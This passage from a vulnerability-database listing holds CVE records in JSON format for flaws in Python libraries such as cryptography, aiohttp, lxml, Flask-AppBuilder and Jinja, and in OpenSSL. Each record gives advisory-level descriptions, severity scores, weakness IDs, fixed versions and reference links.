"role": "CISA Coordinator",
"timestamp": "2026-03-31T13:50:17.743455Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-31T13:52:00.999Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "cryptography",
"vendor": "pyca",
"versions": [
{
"status": "affected",
"version": "\u003c 46.0.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to version 46.0.6, DNS name constraints were only validated against SANs within child certificates, and not the \"peer name\" presented during each validation. Consequently, cryptography would allow a peer named bar.example.com to validate against a wildcard leaf certificate for *.example.com, even if the leaf\u0027s parent certificate (or upwards) contained an excluded subtree constraint for bar.example.com. This issue has been patched in version 46.0.6."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 1.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-295",
"description": "CWE-295: Improper Certificate Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-31T02:04:36.275Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyca/cryptography/security/advisories/GHSA-m959-cc7f-wv43",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-m959-cc7f-wv43"
}
],
"source": {
"advisory": "GHSA-m959-cc7f-wv43",
"discovery": "UNKNOWN"
},
"title": "cryptography has incomplete DNS name constraint enforcement on peer names"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34073",
"datePublished": "2026-03-31T02:04:36.275Z",
"dateReserved": "2026-03-25T16:21:40.868Z",
"dateUpdated": "2026-03-31T13:52:00.999Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34515 (GCVE-0-2026-34515)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:10 – Updated: 2026-04-02 15:38| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34515",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T15:38:30.291699Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T15:38:45.215Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, on Windows the static resource handler may expose information about a NTLMv2 remote path. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-36",
"description": "CWE-36: Absolute Path Traversal",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:10:48.164Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-p998-jp59-783m",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: UNC SSRF/NTLMv2 Credential Theft/Local File Read in static resource handler on Windows"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34515",
"datePublished": "2026-04-01T20:10:48.164Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-04-02T15:38:45.215Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-41066 (GCVE-0-2026-41066)
Vulnerability from cvelistv5 – Published: 2026-04-24 16:45 – Updated: 2026-04-24 18:04- CWE-611 - Improper Restriction of XML External Entity Reference
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-41066",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-24T18:03:40.722204Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-24T18:04:04.548Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "lxml",
"vendor": "lxml",
"versions": [
{
"status": "affected",
"version": "\u003c 6.1.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration (with resolve_entities=True) allows untrusted XML input to read local files. Setting the resolve_entities option explicitly to resolve_entities=\u0027internal\u0027 or resolve_entities=False disables the local file access. This vulnerability is fixed in 6.1.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-611",
"description": "CWE-611: Improper Restriction of XML External Entity Reference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-24T16:45:19.617Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/lxml/lxml/security/advisories/GHSA-vfmq-68hx-4jfw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/lxml/lxml/security/advisories/GHSA-vfmq-68hx-4jfw"
},
{
"name": "https://bugs.launchpad.net/lxml/+bug/2146291",
"tags": [
"x_refsource_MISC"
],
"url": "https://bugs.launchpad.net/lxml/+bug/2146291"
}
],
"source": {
"advisory": "GHSA-vfmq-68hx-4jfw",
"discovery": "UNKNOWN"
},
"title": "lxml: Default configuration of iterparse() and ETCompatXMLParser() allows XXE to local files"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41066",
"datePublished": "2026-04-24T16:45:19.617Z",
"dateReserved": "2026-04-16T16:43:03.174Z",
"dateUpdated": "2026-04-24T18:04:04.548Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-58065 (GCVE-0-2025-58065)
Vulnerability from cvelistv5 – Published: 2025-09-11 17:55 – Updated: 2025-09-11 19:22- CWE-287 - Improper Authentication
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| dpgaspar | Flask-AppBuilder |
Affected:
< 4.8.1
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-58065",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-11T19:22:07.902786Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-11T19:22:16.705Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Flask-AppBuilder",
"vendor": "dpgaspar",
"versions": [
{
"status": "affected",
"version": "\u003c 4.8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Flask-AppBuilder is an application development framework. Prior to version 4.8.1, when Flask-AppBuilder is configured to use OAuth, LDAP, or other non-database authentication methods, the password reset endpoint remains registered and accessible, despite not being displayed in the user interface. This allows an enabled user to reset their password and be able to create JWT tokens even after the user is disabled on the authentication provider. Users should upgrade to Flask-AppBuilder version 4.8.1 or later to receive a fix. If immediate upgrade is not possible, manually disable password reset routes in the application configuration; implement additional access controls at the web server or proxy level to block access to the reset my password URL; and/or monitor for suspicious password reset attempts from disabled accounts."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-11T17:55:48.520Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-765j-9r45-w2q2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-765j-9r45-w2q2"
},
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/pull/2384",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/pull/2384"
},
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/commit/a942a9cc5775752f9a02f97fd8198dd288fa93ee",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/commit/a942a9cc5775752f9a02f97fd8198dd288fa93ee"
},
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v4.8.1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v4.8.1"
}
],
"source": {
"advisory": "GHSA-765j-9r45-w2q2",
"discovery": "UNKNOWN"
},
"title": "Flask App Builder has an Authentication Bypass vulnerability when using non AUTH_DB methods"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-58065",
"datePublished": "2025-09-11T17:55:48.520Z",
"dateReserved": "2025-08-22T14:30:32.222Z",
"dateUpdated": "2025-09-11T19:22:16.705Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-69227 (GCVE-0-2025-69227)
Vulnerability from cvelistv5 – Published: 2026-01-05 23:19 – Updated: 2026-01-06 19:02- CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69227",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:25:12.409319Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:02:48.192Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow for an infinite loop to occur when assert statements are bypassed, resulting in a DoS attack when processing a POST body. If optimizations are enabled (-O or PYTHONOPTIMIZE=1), and the application includes a handler that uses the Request.post() method, then an attacker may be able to execute a DoS attack with a specially crafted message. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-835",
"description": "CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T23:19:31.396Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259"
}
],
"source": {
"advisory": "GHSA-jj3x-wxrx-4x23",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP vulnerable to DoS when bypassing asserts"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69227",
"datePublished": "2026-01-05T23:19:31.396Z",
"dateReserved": "2025-12-29T20:53:19.433Z",
"dateUpdated": "2026-01-06T19:02:48.192Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-27516 (GCVE-0-2025-27516)
Vulnerability from cvelistv5 – Published: 2025-03-05 20:40 – Updated: 2026-02-26 19:09- CWE-1336 - Improper Neutralization of Special Elements Used in a Template Engine
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-27516",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-31T03:56:03.356670Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-26T19:09:45.280Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T19:45:35.548Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00045.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "jinja",
"vendor": "pallets",
"versions": [
{
"status": "affected",
"version": "\u003c 3.1.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Jinja is an extensible templating engine. Prior to 3.1.6, an oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja\u0027s sandbox does catch calls to str.format and ensures they don\u0027t escape the sandbox. However, it\u0027s possible to use the |attr filter to get a reference to a string\u0027s plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment\u0027s attribute lookup. This vulnerability is fixed in 3.1.6."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1336",
"description": "CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-05T20:40:06.568Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7"
},
{
"name": "https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403"
}
],
"source": {
"advisory": "GHSA-cpwx-vrp4-4pq7",
"discovery": "UNKNOWN"
},
"title": "Jinja sandbox breakout through attr filter selecting format method"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-27516",
"datePublished": "2025-03-05T20:40:06.568Z",
"dateReserved": "2025-02-26T18:11:52.307Z",
"dateUpdated": "2026-02-26T19:09:45.280Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-69230 (GCVE-0-2025-69230)
Vulnerability from cvelistv5 – Published: 2026-01-05 23:47 – Updated: 2026-01-06 19:01- CWE-779 - Logging of Excessive Data
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69230",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:24:37.620821Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:01:58.928Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, reading multiple invalid cookies can lead to a logging storm. If the cookies attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header. This issue is fixed in 3.13.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-779",
"description": "CWE-779: Logging of Excessive Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T23:47:38.873Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326"
}
],
"source": {
"advisory": "GHSA-fh55-r93g-j68g",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP Vulnerable to Cookie Parser Warning Storm"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69230",
"datePublished": "2026-01-05T23:47:38.873Z",
"dateReserved": "2025-12-29T20:53:49.676Z",
"dateUpdated": "2026-01-06T19:01:58.928Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-12797 (GCVE-0-2024-12797)
Vulnerability from cvelistv5 – Published: 2025-02-11 15:59 – Updated: 2025-02-18 14:01- CWE-392 - Missing Report of Error Condition
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-02-15T00:10:32.191Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/02/11/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/02/11/4"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250214-0001/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-12797",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-14T20:24:14.595864Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-18T14:01:55.140Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSL",
"vendor": "OpenSSL",
"versions": [
{
"lessThan": "3.4.1",
"status": "affected",
"version": "3.4.0",
"versionType": "semver"
},
{
"lessThan": "3.3.3",
"status": "affected",
"version": "3.3.0",
"versionType": "semver"
},
{
"lessThan": "3.2.4",
"status": "affected",
"version": "3.2.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Apple Inc."
},
{
"lang": "en",
"type": "remediation developer",
"value": "Viktor Dukhovni"
}
],
"datePublic": "2025-02-11T14:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Issue summary: Clients using RFC7250 Raw Public Keys (RPKs) to authenticate a\u003cbr\u003eserver may fail to notice that the server was not authenticated, because\u003cbr\u003ehandshakes don\u0027t abort as expected when the SSL_VERIFY_PEER verification mode\u003cbr\u003eis set.\u003cbr\u003e\u003cbr\u003eImpact summary: TLS and DTLS connections using raw public keys may be\u003cbr\u003evulnerable to man-in-middle attacks when server authentication failure is not\u003cbr\u003edetected by clients.\u003cbr\u003e\u003cbr\u003eRPKs are disabled by default in both TLS clients and TLS servers. The issue\u003cbr\u003eonly arises when TLS clients explicitly enable RPK use by the server, and the\u003cbr\u003eserver, likewise, enables sending of an RPK instead of an X.509 certificate\u003cbr\u003echain. The affected clients are those that then rely on the handshake to\u003cbr\u003efail when the server\u0027s RPK fails to match one of the expected public keys,\u003cbr\u003eby setting the verification mode to SSL_VERIFY_PEER.\u003cbr\u003e\u003cbr\u003eClients that enable server-side raw public keys can still find out that raw\u003cbr\u003epublic key verification failed by calling SSL_get_verify_result(), and those\u003cbr\u003ethat do, and take appropriate action, are not affected. This issue was\u003cbr\u003eintroduced in the initial implementation of RPK support in OpenSSL 3.2.\u003cbr\u003e\u003cbr\u003eThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue."
}
],
"value": "Issue summary: Clients using RFC7250 Raw Public Keys (RPKs) to authenticate a\nserver may fail to notice that the server was not authenticated, because\nhandshakes don\u0027t abort as expected when the SSL_VERIFY_PEER verification mode\nis set.\n\nImpact summary: TLS and DTLS connections using raw public keys may be\nvulnerable to man-in-middle attacks when server authentication failure is not\ndetected by clients.\n\nRPKs are disabled by default in both TLS clients and TLS servers. The issue\nonly arises when TLS clients explicitly enable RPK use by the server, and the\nserver, likewise, enables sending of an RPK instead of an X.509 certificate\nchain. The affected clients are those that then rely on the handshake to\nfail when the server\u0027s RPK fails to match one of the expected public keys,\nby setting the verification mode to SSL_VERIFY_PEER.\n\nClients that enable server-side raw public keys can still find out that raw\npublic key verification failed by calling SSL_get_verify_result(), and those\nthat do, and take appropriate action, are not affected. This issue was\nintroduced in the initial implementation of RPK support in OpenSSL 3.2.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue."
}
],
"metrics": [
{
"format": "other",
"other": {
"content": {
"text": "High"
},
"type": "https://openssl-library.org/policies/general/security-policy/"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-392",
"description": "CWE-392 Missing Report of Error Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-11T15:59:36.719Z",
"orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5",
"shortName": "openssl"
},
"references": [
{
"name": "OpenSSL Advisory",
"tags": [
"vendor-advisory"
],
"url": "https://openssl-library.org/news/secadv/20250211.txt"
},
{
"name": "3.4.1 git commit",
"tags": [
"patch"
],
"url": "https://github.com/openssl/openssl/commit/738d4f9fdeaad57660dcba50a619fafced3fd5e9"
},
{
"name": "3.3.3 git commit",
"tags": [
"patch"
],
